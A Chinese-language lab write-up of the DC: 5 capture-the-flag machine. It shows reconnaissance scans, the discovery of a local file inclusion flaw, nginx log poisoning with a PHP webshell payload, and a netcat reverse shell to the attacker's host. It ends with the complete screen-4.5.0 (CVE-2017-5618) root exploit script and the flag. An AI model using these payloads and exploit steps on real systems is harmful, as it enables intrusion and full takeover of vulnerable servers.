DC 系列的第五題,該題 DC: 5 也是目前為止花費最多時間的一題,過程中也更為基礎加固、更扎實些,資安的學習也真的是需要不斷的經驗累積,涉及廣闊,不大可能樣樣精通,只有大量累積經驗、吸收關鍵字、刺激思維,才能夠因應各種環境逐一挖掘弱點。
目錄
環境設定
VirtualBox: Kali & DC: 5
Net Config: NAT Network
尋找靶機
$ nmap 10.0.2.1/24 -sP
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-02 17:49 CST
Nmap scan report for 10.0.2.1
Host is up (0.0049s latency).
Nmap scan report for 10.0.2.2
Host is up (0.0088s latency).
Nmap scan report for 10.0.2.11
Host is up (0.0013s latency).
Nmap scan report for 10.0.2.15
Host is up (0.00040s latency).
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.56 seconds
$ nmap 10.0.2.11 -p- -A
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-02 17:49 CST
Nmap scan report for 10.0.2.11
Host is up (0.0024s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.6.2
|_http-server-header: nginx/1.6.2
|_http-title: Welcome
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 38053/tcp status
| 100024 1 52396/tcp6 status
| 100024 1 57321/udp6 status
|_ 100024 1 58274/udp status
38053/tcp open status 1 (RPC #100024)
解題過程
Wappalyzer
首先瀏覽 Port 80 感覺上是一個簡易的 CMS 服務,透過 Wappalyzer 沒有什麼發現。
目錄爆破
緊接著透過 drisearch 進行目錄爆破,同樣沒有什麼發現。
$ python3 dirsearch.py -u http://10.0.2.11/ -w db/all.txt -e php
_|. _ _ _ _ _ _|_ v0.4.1
(_||| _) (/_(_|| (_| )
Extensions: php | HTTP method: GET | Threads: 30 | Wordlist size: 86760
Error Log: /home/mksyi/下載/dirsearch/logs/errors-21-02-03_10-24-34.log
Target: http://10.0.2.11/
Output File: /home/mksyi/下載/dirsearch/reports/10.0.2.11/_21-02-03_10-24-34.txt
[10:24:34] Starting:
[10:24:41] 301 - 184B - /images/
[10:24:48] 403 - 570B - /css/
[10:24:58] 200 - 4KB - /solutions.php
[10:25:13] 200 - 4KB - /index.php
[10:25:33] 200 - 852B - /thankyou.php
[10:25:40] 200 - 6KB - /faq.php
[10:26:26] 200 - 17B - /footer.php
[10:26:33] 200 - 4KB - /contact.php
Task Completed
LFI
經過一系列的探勘,有功能的部分僅有 contact.php
與 thankyou.php
兩個頁面,其中有想過,會不會是透過 contact.php
聯繫站長,並藉機 XSS 攻擊,但 submit 後,頁面僅僅使用 GET 轉跳到 thankyou.php
頁面,甚至我還裝 Beef 工具進行嘗試,顯然沒有任何進展。
之後在 thankyou.php
頁面發現底部的月份會隨著重新整理不斷變化。
第一時間看到 footer 的變化,僅覺得可能是 Load Balance 機制,並沒有其他想法,但隨著時間拉長,皆沒有新的發現與突破,心想不會這麼通靈吧…,直到用了 fuzz 把 thankyou.php
的參數名稱爆了一輪,發現 /thankyou.php?file
的結果與其他不同。
- –hh 851: 隱藏條件 Chars 字數為 851 的項目
由於名稱為 file 的直覺,直接使用 /etc/passwd
來嘗試,結果真的把檔案讀出來了,於是挖掘出一個 LFI(Local File inclusion) 弱點。
透過 PHP 偽協議取得 thankyou.php 的原始碼,其中比較關鍵的程式碼如下。
http://10.0.2.11/thankyou.php?file=php://filter/convert.base64-encode/resource=thankyou.php
<?php
$file = $_GET['file'];
if(isset($file))
{
include("$file");
}
else
{
include("footer.php");
}
?>
Get Shell
透過 LFI 探看發現 nginx 的設定檔位置為 /etc/nginx/nginx.conf
,獲得 Logs 的存放位置為 /var/log/nginx/{access|error}.log
,可以藉由 log 紀錄進行寫入,藉此把 PHP Code 寫到 log 中,再藉由 LFI 讀取 Log 檔,由於 include
會針對 <?php ?>
標籤內的內容進行解析,藉此來完成「寫檔」、「讀檔」、「執行」。
預設的 nginx 設定擋路徑參考:How to Configure NGINX
上傳 Shell
首先可以決定要產生「正常」或「錯誤」的 Log,以正常的 Log 為例,雖然回應 404,但非伺服器端錯誤(500),所以 Log 會寫至 access.log 中。
http://10.0.2.11/AAA<?php echo system($_POST['cmd']); ?>
這邊踩了一個坑,由於太習慣用 Hackbar 送 Payload,導致送出的 Payload 被瀏覽器做一層 URLencode,然後也不知道怎麼誤打誤撞的成功過一次,之後就執著於此,要再次復現就困難重重,並不斷迴圈,甚至還重佈了幾次靶機,最後同事說用 Burp 送,Burp 丟出來的東西是最原始的,然後就成功把 Webshell 寫進 Log 了。
取得 Shell
Listen
nc -nl -vv -p 8888
Victim
nc -e /bin/sh 10.0.2.15 8888
python -c "import pty;pty.spawn('/bin/bash')"
提權
Linux exploit sugester
透過 linux-exploit-suggester 快速分析出可能存在的 Exploit。
www-data@dc-5:/tmp$ chmod +x linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
www-data@dc-5:/tmp$ ./linux-exploit-suggester.sh
./linux-exploit-suggester.sh
Available information:
Kernel version: 3.16.0
Architecture: x86_64
Distribution: debian
Distribution version: 8
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS
Searching among:
74 kernel space exploits
46 user space exploits
Possible Exploits:
[+] [CVE-2016-5195] dirtycow
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: [ debian=7|8 ],RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2016-5195] dirtycow 2
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: [ debian=7|8 ],RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2016-1247] nginxed-root.sh
Details: https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html
Exposure: probable
Tags: [ debian=8 ],ubuntu=14.04|16.04|16.10
Download URL: https://legalhackers.com/exploits/CVE-2016-1247/nginxed-root.sh
Comments: Rooting depends on cron.daily (up to 24h of delay). Affected: deb8: <1.6.2; 14.04: <1.4.6; 16.04: 1.10.0; gentoo: <1.10.2-r3
[+] [CVE-2017-6074] dccp
Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
Exposure: less probable
Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
Download URL: https://www.exploit-db.com/download/41458
Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
[+] [CVE-2017-1000366,CVE-2017-1000379] linux_ldso_hwcap_64
Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
Exposure: less probable
Tags: debian=7.7|8.5|9.0,ubuntu=14.04.2|16.04.2|17.04,fedora=22|25,centos=7.3.1611
Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap_64.c
Comments: Uses "Stack Clash" technique, works against most SUID-root binaries
[+] [CVE-2017-1000253] PIE_stack_corruption
Details: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.txt
Exposure: less probable
Tags: RHEL=6,RHEL=7{kernel:3.10.0-514.21.2|3.10.0-514.26.1}
Download URL: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.c
[+] [CVE-2016-2384] usb-midi
Details: https://xairy.github.io/blog/2016/cve-2016-2384
Exposure: less probable
Tags: ubuntu=14.04,fedora=22
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user
[+] [CVE-2015-9322] BadIRET
Details: http://labs.bromium.com/2015/02/02/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/
Exposure: less probable
Tags: RHEL<=7,fedora=20
Download URL: http://site.pi3.com.pl/exp/p_cve-2014-9322.tar.gz
[+] [CVE-2015-8660] overlayfs (ovl_setattr)
Details: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/
Exposure: less probable
Tags: ubuntu=(14.04|15.10){kernel:4.2.0-(18|19|20|21|22)-generic}
Download URL: https://www.exploit-db.com/download/39166
[+] [CVE-2015-8660] overlayfs (ovl_setattr)
Details: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/39230
[+] [CVE-2015-3290] espfix64_NMI
Details: http://www.openwall.com/lists/oss-security/2015/08/04/8
Exposure: less probable
Download URL: https://www.exploit-db.com/download/37722
[+] [CVE-2015-1328] overlayfs
Details: http://seclists.org/oss-sec/2015/q2/717
Exposure: less probable
Tags: ubuntu=(12.04|14.04){kernel:3.13.0-(2|3|4|5)*-generic},ubuntu=(14.10|15.04){kernel:3.(13|16).0-*-generic}
Download URL: https://www.exploit-db.com/download/37292
[+] [CVE-2014-5207] fuse_suid
Details: https://www.exploit-db.com/exploits/34923/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/34923
[+] [CVE-2016-0728] keyring
Details: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/40003
Comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working
SUID check
www-data@dc-5:/tmp$ find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
/bin/su
/bin/mount
/bin/umount
/bin/screen-4.5.0
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/sbin/mount.nfs
Get Root
透過以上資訊蒐集得到系統上可能存在 dirtycow 漏洞,但經過嘗試無法成功編譯,於是看到 SUID 的部分含有一支可疑的程式 screen-4.5.0
,於是找到了 CVE-2017-5618 弱點,但發現他的 PoC 好像末端都藏有一個隱藏字元,若沒清掉無法直接使用,還好只是小小的 sh 檔,複製貼上拆出來跑就行。
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
screen -ls
/tmp/rootshell
# whoami
root
cc1 導致無法編譯問題
這邊感謝同事支援,在 Reverse shell 底下,若要直接使用 gcc 進行編譯,則會噴出找不到 cc1
的問題,為了解決這個問題使用 export PATH=$PATH
指令來搞定,據同事大大的分析與猜測指出,該址指令是把「環境變數」寫到「區域變數」,至於在執行前輸入 $PATH
是含有 gcc 資訊的,至於為什麼需要手動重新賦值,主要原因可能是因為在 Reverse shell 下導致 Shell 在 Fork 時,區域變數沒有被賦值。
$ gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
gcc: error trying to exec 'cc1': execvp: No such file or directory
感恩 Z大 讚嘆 Z大
Flag
# cat /root/thisistheflag.txt
888b 888 d8b 888 888 888 888
8888b 888 Y8P 888 888 888 888
88888b 888 888 888 888 888
888Y88b 888 888 .d8888b .d88b. 888 888 888 .d88b. 888d888 888 888 888 888 888
888 Y88b888 888 d88P" d8P Y8b 888 888 888 d88""88b 888P" 888 .88P 888 888 888
888 Y88888 888 888 88888888 888 888 888 888 888 888 888888K Y8P Y8P Y8P
888 Y8888 888 Y88b. Y8b. Y88b 888 d88P Y88..88P 888 888 "88b " " "
888 Y888 888 "Y8888P "Y8888 "Y8888888P" "Y88P" 888 888 888 888 888 888
Once again, a big thanks to all those who do these little challenges,
and especially all those who give me feedback - again, it's all greatly
appreciated. :-)
I also want to send a big thanks to all those who find the vulnerabilities
and create the exploits that make these challenges possible.